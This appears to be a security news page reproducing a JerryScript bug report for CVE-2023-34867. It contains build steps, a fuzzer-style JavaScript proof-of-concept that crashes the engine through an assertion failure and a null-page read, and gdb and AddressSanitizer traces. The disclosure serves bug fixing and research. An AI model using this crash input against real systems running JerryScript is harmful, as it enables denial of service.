Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-34867: Assertion 'ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p)' failed at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c(ecma_property_hashmap_create) · Issue #5084 · jerryscript-project/jerryscr

Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_property_hashmap_create at jerry-core/ecma/base/ecma-property-hashmap.c.

CVE
#ubuntu#linux#js#git

JerryScript revision

Commit: 05dbbd1
Version: v3.0.0

Build platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build steps

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

Test casetestcase

var r = function ( func0 , a ) { for ( var v in a || { } ) { r [ v ] = a [ v ] ; } return r ; } ; var a = [ ] ; for ( var v = 0 ; v < 256 ; v ++ ) { var n = Object . create ( null ) ; a . push ( n , a ) ; n . v = 1 ; n . o = 1 ; n = new WeakSet ( a ) ; n . t = 1 ; n . o = 1 ; } n . i = 1 ;

if ( ! a ) throw new Test262Error ( " out " ) ;

n . O = 1 ; n . m = 1 ; n = JSON . stringify ( JSON . stringify ( n , a ) ) ;

if ( r . deref != 1 ) throw new Test262Error ( " digit " ) ;

n . h = 1 ; n . T = 1 ; n . U = 1 ; n . g = 1 ; n . j = 1 ; n . k = 1 ; n . m = 1 ; n . p = 1 ; n . q = 1 ; n . A = 1 ; n . B = 1 ; n . as = 1 ; n . C = 1 ; n . A = 1 ; n . q = 0.1 ; n . D = 1 ; n . F = 1 ; n . G = 1 ; n . ax = 1 ; n . ax = 1 ; n . H = 1 ; n . I = 1 ; n . J = 1 ; n . K = 1 ; n . L = 1 ; n . M = 1 ; n . N = 1 ; var o = Object . create ( n ) ; var f = r ( { } , o ) ; for ( var t in f ) { if ( f [ t ] !== f [ " " ] ) { if ( f [ t ] !== f [ " " + t ] ) { throw new Error ( " OUT " ) ; } } }

// poc.js var a = [ ] ; for ( var v = 0 ; v < 256 ; v ++ ) { var n = Object . create ( null ) ; a . push ( n , a ) ; n = new WeakSet ( a ) ; n . o = 1 ; }

Execution steps & Output

$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p)' failed at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c(ecma_property_hashmap_create):146.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted

Backtrace

(gdb) bt
#0  0xf7fcfd99 in __kernel_vsyscall ()
#1  0xf7ca4276 in raise () from /lib32/libc.so.6
#2  0xf7c8c3f7 in abort () from /lib32/libc.so.6
#3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at ./jerryscript/jerry-port/common/jerry-port-process.c:29
#4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at ./jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5  0x08260d64 in jerry_assert_fail (assertion=0x8418d00 <str> "ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p)",
    file=0x8418d60 <str> "./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c", function=0x8418de0 <__func__.ecma_property_hashmap_create> "ecma_property_hashmap_create",
    line=146) at ./jerryscript/jerry-core/jrt/jrt-fatals.c:83
#6  0x081a3e63 in ecma_property_hashmap_create (object_p=0xf5500880) at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c:146
#7  0x081a4342 in ecma_property_hashmap_insert (object_p=0xf5500880, name_p=0x3815, property_pair_p=0xf2d1a140, property_index=0)
    at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c:236
#8  0x08189d0a in ecma_create_property (object_p=<optimized out>, name_p=<optimized out>, type_and_flags=<optimized out>, value=..., out_prop_p=<optimized out>)
    at ./jerryscript/jerry-core/ecma/base/ecma-helpers.c:448
#9  0x0818836a in ecma_create_named_data_property (object_p=0xf5500880, name_p=0x3815, prop_attributes=7 '\a', out_prop_p=0x0)
    at ./jerryscript/jerry-core/ecma/base/ecma-helpers.c:536
#10 0x08217e4e in ecma_op_object_put_apply_receiver (receiver=<optimized out>, property_name_p=<optimized out>, value=<optimized out>, is_throw=<optimized out>)
    at ./jerryscript/jerry-core/ecma/operations/ecma-objects.c:1241
#11 0x08216a71 in ecma_op_object_put_with_receiver (object_p=<optimized out>, property_name_p=<optimized out>, value=<optimized out>, receiver=<optimized out>, is_throw=<optimized out>)
    at ./jerryscript/jerry-core/ecma/operations/ecma-objects.c:1595
#12 0x08214f3a in ecma_op_object_put (object_p=0xf5500880, property_name_p=0x3815, value=<optimized out>, is_throw=<optimized out>)
    at ./jerryscript/jerry-core/ecma/operations/ecma-objects.c:1143
#13 ecma_op_object_put_by_index (object_p=0xf5500880, index=448, value=4117759059, is_throw=<optimized out>) at ./jerryscript/jerry-core/ecma/operations/ecma-objects.c:1109
#14 0x0830d9b1 in ecma_builtin_array_prototype_object_push (argument_list_p=<optimized out>, arguments_number=2, obj_p=0xf5500880, length=448)
    at ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:465
#15 ecma_builtin_array_prototype_dispatch_routine (builtin_routine_id=<optimized out>, this_arg=<optimized out>, arguments_list_p=<optimized out>, arguments_number=<optimized out>)
    at ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2839
#16 0x081b94a5 in ecma_builtin_dispatch_routine (func_obj_p=<optimized out>, this_arg_value=<optimized out>, arguments_list_p=0xffffce30, arguments_list_len=<optimized out>)
    at ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#17 ecma_builtin_dispatch_call (obj_p=<optimized out>, this_arg_value=<optimized out>, arguments_list_p=<optimized out>, arguments_list_len=<optimized out>)
    at ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#18 0x081fb6b8 in ecma_op_function_call_native_built_in (func_obj_p=0xf5500790, this_arg_value=4115662979, arguments_list_p=0xffffd054, arguments_list_len=2)
    at ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#19 0x081fa81d in ecma_op_function_call (func_obj_p=0xf5500790, this_arg_value=4115662979, arguments_list_p=0xffffd054, arguments_list_len=2)
    at ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#20 0x081fa5cf in ecma_op_function_validated_call (callee=4115662739, this_arg_value=4115662979, arguments_list_p=0xffffd054, arguments_list_len=2)
    at ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
#21 0x082d7631 in opfunc_call (frame_ctx_p=<optimized out>) at ./jerryscript/jerry-core/vm/vm.c:758
#22 vm_execute (frame_ctx_p=0xffffd020) at ./jerryscript/jerry-core/vm/vm.c:5217
#23 0x082d4f62 in vm_run (shared_p=0xffffd110, this_binding_value=4119870595, lex_env_p=0xf57007b0) at ./jerryscript/jerry-core/vm/vm.c:5312
#24 0x082d4c39 in vm_run_global (bytecode_p=<optimized out>, function_object_p=<optimized out>) at ./jerryscript/jerry-core/vm/vm.c:286
#25 0x0812a4e5 in jerry_run (script=4115663075) at ./jerryscript/jerry-core/api/jerryscript.c:548
#26 0x083eac3f in jerryx_source_exec_script (path_p=0xffffd5df "poc.js") at ./jerryscript/jerry-ext/util/sources.c:68
#27 0x0812162d in main (argc=<optimized out>, argv=<optimized out>) at ./jerryscript/jerry-main/main-desktop.c:156
(gdb)

with release mode

Outputs

AddressSanitizer:DEADLYSIGNAL
=================================================================
==1512811==ERROR: AddressSanitizer: SEGV on unknown address 0x0000023e (pc 0x5659bb0f bp 0xff8ef1d8 sp 0xff8ef190 T0)
==1512811==The signal is caused by a READ memory access.
==1512811==Hint: address points to the zero page.
    #0 0x5659bb0e in ecma_gc_mark_properties ./jerryscript/jerry-core/ecma/base/ecma-gc.c:287
    #1 0x5659e95d in ecma_gc_run ./jerryscript/jerry-core/ecma/base/ecma-gc.c:2158
    #2 0x565f3d83 in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:285
    #3 0x566365ad in ecma_alloc_property_pair ./jerryscript/jerry-core/ecma/base/ecma-alloc.c:253
    #4 0x565ac30d in ecma_create_property ./jerryscript/jerry-core/ecma/base/ecma-helpers.c:457
    #5 0x565d424d in ecma_create_iter_result_object ./jerryscript/jerry-core/ecma/operations/ecma-iterator-object.c:98
    #6 0x56636d82 in ecma_builtin_array_iterator_prototype_object_next ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-iterator-prototype.c:172
    #7 0x56636d82 in ecma_builtin_array_iterator_prototype_dispatch_routine ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-iterator-prototype.c:211
    #8 0x565bba28 in ecma_builtin_dispatch_routine ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
    #9 0x565bba28 in ecma_builtin_dispatch_call ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
    #10 0x565d0db7 in ecma_op_function_call_native_built_in ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
    #11 0x565d2c84 in ecma_op_function_call ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
    #12 0x565d449d in ecma_op_iterator_next ./jerryscript/jerry-core/ecma/operations/ecma-iterator-object.c:317
    #13 0x565d46d3 in ecma_op_iterator_step ./jerryscript/jerry-core/ecma/operations/ecma-iterator-object.c:559
    #14 0x565ca92e in ecma_op_container_create ./jerryscript/jerry-core/ecma/operations/ecma-container-object.c:435
    #15 0x56657dbd in ecma_builtin_weakset_dispatch_construct ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-weakset.c:62
    #16 0x565d3086 in ecma_op_function_construct_built_in ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1537
    #17 0x565d3086 in ecma_op_function_construct ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1717
    #18 0x56634c33 in opfunc_construct ./jerryscript/jerry-core/vm/vm.c:840
    #19 0x56634c33 in vm_execute ./jerryscript/jerry-core/vm/vm.c:5236
    #20 0x56635152 in vm_run ./jerryscript/jerry-core/vm/vm.c:5312
    #21 0x5663538f in vm_run_global ./jerryscript/jerry-core/vm/vm.c:286
    #22 0x5659382e in jerry_run ./jerryscript/jerry-core/api/jerryscript.c:548
    #23 0x5668871b in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:68
    #24 0x5658bd04 in main ./jerryscript/jerry-main/main-desktop.c:156
    #25 0xf76ceed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
    #26 0x5658efb4 in _start (/./jerryscript/build/bin/jerry+0x12fb4)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ./jerryscript/jerry-core/ecma/base/ecma-gc.c:287 in ecma_gc_mark_properties
==1512811==ABORTING

Credits: @Ye0nny, @EJueon of the seclab-yonsei.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda